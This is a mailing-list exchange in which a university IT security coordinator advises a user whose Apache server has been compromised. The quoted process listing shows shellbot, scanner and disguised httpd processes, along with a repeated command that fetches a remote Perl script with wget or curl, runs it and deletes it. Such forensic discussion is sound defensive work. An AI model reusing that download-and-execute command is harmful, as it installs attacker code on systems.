[ubuntu-uk] off topic - server security

Tony Arnold tony.arnold at manchester.ac.uk
Thu Dec 27 08:22:53 GMT 2007 

Sean,

I'd have a look at the apache logs and see what URLs are being accessed
and go from there. Their location might give you a clue.

Do you have any PHP stuff on their such as PhpBB or similar?

Regards,
Tony.

Sean Miller wrote:
> Here's a "ps -fe" I did a little while ago, just before I rebooted...
> 
> As you can see, they're really working hard to frustrate me...
> 
> Sean
> 
> [root at s15247463 httpdocs]# ps -fe | grep apache
> apache    2889  2220  1 Dec26 ?        00:18:36 /usr/sbin/httpd
> apache    2891  2220  0 Dec26 ?        00:00:00 /usr/sbin/httpd
> apache    2892  2220  0 Dec26 ?        00:00:02 /usr/sbin/httpd
> apache    2893  2220  0 Dec26 ?        00:00:02 /usr/sbin/httpd
> apache    2894  2220  0 Dec26 ?        00:00:00 /usr/sbin/httpd
> apache    2895  2220  0 Dec26 ?        00:00:05 /usr/sbin/httpd
> apache    2896  2220  0 Dec26 ?        00:00:02 /usr/sbin/httpd
> apache   14664  2220  0 Dec26 ?        00:00:03 /usr/sbin/httpd
> apache   32714     1  0 Dec26 ?        00:00:02 /apache/bin/httpd
> apache   32719     1  0 Dec26 ?        00:00:02 /apache/bin/httpd
> apache   19751  2894  0 Dec26 ?        00:00:00 [sh] <defunct>
> apache   19764     1 23 Dec26 ?        03:31:35 shellbot      
> apache   28642  2220  0 Dec26 ?        00:00:04 /usr/sbin/httpd
> apache   28662  2891  0 Dec26 ?        00:00:00 [sh] <defunct>
> apache   28666     1 22 Dec26 ?        03:23:10 shellbot      
> apache   29532  2220  0 Dec26 ?        00:00:01 /usr/sbin/httpd
> apache   29933  2220  0 Dec26 ?        00:07:18 /usr/sbin/httpd
> apache   20833  2893  0 Dec26 ?        00:00:00 [sh] <defunct>
> apache   20838     1 13 Dec26 ?        01:21:35 [httpds]   
> apache   20847 29532  0 Dec26 ?        00:00:00 [sh] <defunct>
> apache   20853     1 13 Dec26 ?        01:21:33 [httpds]   
> apache   20870  2220  0 Dec26 ?        00:00:02 /usr/sbin/httpd
> apache   20879  2892  0 Dec26 ?        00:00:00 [sh] <defunct>
> apache   20884     1 13 Dec26 ?        01:21:28 [httpds]   
> apache   20887  2896  0 Dec26 ?        00:00:00 [sh] <defunct>
> apache   20892     1 13 Dec26 ?        01:21:16 [httpds]   
> apache   20895  2220  0 Dec26 ?        00:00:01 /usr/sbin/httpd
> apache   20896  2220  0 Dec26 ?        00:00:02 /usr/sbin/httpd
> apache   20901  2220  0 Dec26 ?        00:00:02 /usr/sbin/httpd
> apache   21445  2220  0 Dec26 ?        00:00:01 /usr/sbin/httpd
> apache    1875     1  0 00:01 ?        00:00:00 [httpds]   
> apache    2237     1  0 00:14 ?        00:00:00 ./mocks start
> apache    5465 20895  0 00:23 ?        00:00:00 [sh] <defunct>
> apache    5477     1  6 00:23 ?        00:24:48 shellbot      
> apache   10110 14664  0 01:00 ?        00:00:00 [sh] <defunct>
> apache   10142     1 11 01:00 ?        00:44:09 shellbot      
> apache   10537  2220  0 01:27 ?        00:00:01 /usr/sbin/httpd
> apache   13780     1  0 02:28 ?        00:00:00 [httpds]   
> apache   13781 13780  0 02:28 ?        00:00:00 sh -c wget
> http://www.i-servers.nl/rooster/test.txt;curl -O
> http://www.i-servers.nl/rooster/test.txt;perl test.txt;rm -rf test* 2>&1
> 3>&1
> apache   13784     1  0 02:28 ?        00:00:00 [httpds]   
> apache   13785 13784  0 02:28 ?        00:00:00 sh -c wget
> http://www.i-servers.nl/rooster/test.txt;curl -O
> http://www.i-servers.nl/rooster/test.txt;perl test.txt;rm -rf test* 2>&1
> 3>&1
> apache   13788     1  0 02:28 ?        00:00:00 [httpds]   
> apache   13789 13788  0 02:28 ?        00:00:00 sh -c wget
> http://www.i-servers.nl/rooster/test.txt;curl -O
> http://www.i-servers.nl/rooster/test.txt;perl test.txt ;rm -rf test*
> 2>&1 3>&1
> apache   13792     1  0 02:28 ?        00:00:00 [httpds]   
> apache   13793 13792  0 02:28 ?        00:00:00 sh -c wget
> http://www.i-servers.nl/rooster/test.txt;curl
> <http://www.i-servers.nl/rooster/test.txt;curl> -O
> http://www.i-servers.nl/rooster/test.txt;perl test.txt;rm -rf test* 2>&1
> 3>&1
> apache   13798 13789  0 02:29 ?        00:00:00 perl test.txt
> apache   13802 13781  0 02:29 ?        00:00:00 perl test.txt
> apache   13806 13793  0 02:29 ?        00:00:00 perl test.txt
> apache   13810 13785  0 02:29 ?        00:00:00 perl test.txt
> apache   22282  2220  0 03:40 ?        00:00:00 /usr/sbin/httpd
> apache   22434 20896  0 03:51 ?        00:00:00 [sh] <defunct>
> apache   22442     1 10 03:51 ?        00:20:33 [httpd]
> apache   22513 21445  0 03:55 ?        00:00:00 [perl] <defunct>
> apache   22515     1  0 03:55 ?        00:00:00
> /usr/local/apache/bin/nscan -DSSL
> apache   22552  2220  0 03:58 ?        00:00:00 /usr/sbin/httpd
> apache   23183     1  0 04:03 ?        00:00:48
> /usr/local/apache/bin/nscan -DSSL
> apache   23187     1  0 04:03 ?        00:00:47
> /usr/local/apache/bin/nscan -DSSL
> apache    3606  2220  0 04:52 ?        00:00:00 /usr/sbin/httpd
> apache   27716     1  0 06:54 ?        00:00:00 [httpd]
> apache   27720     1  0 06:54 ?        00:00:00 ./php
> apache   28140     1  0 07:06 ?        00:00:00 /bin/sh ./mass 139
> apache   28299 28140  0 07:12 ?        00:00:00 /bin/bash ./a 139.1
> apache   28302 28299  9 07:12 ?        00:00:20 /bin/bash  139.1 22
> 

-- 
Tony Arnold, IT Security Coordinator, University of Manchester,
IT Services Division, Kilburn Building, Oxford Road, Manchester M13 9PL.
T: +44 (0)161 275 6093, F: +44 (0)870 136 1004, M: +44 (0)773 330 0039
E: tony.arnold at manchester.ac.uk, H: http://www.man.ac.uk/Tony.Arnold

More information about the ubuntu-uk mailing list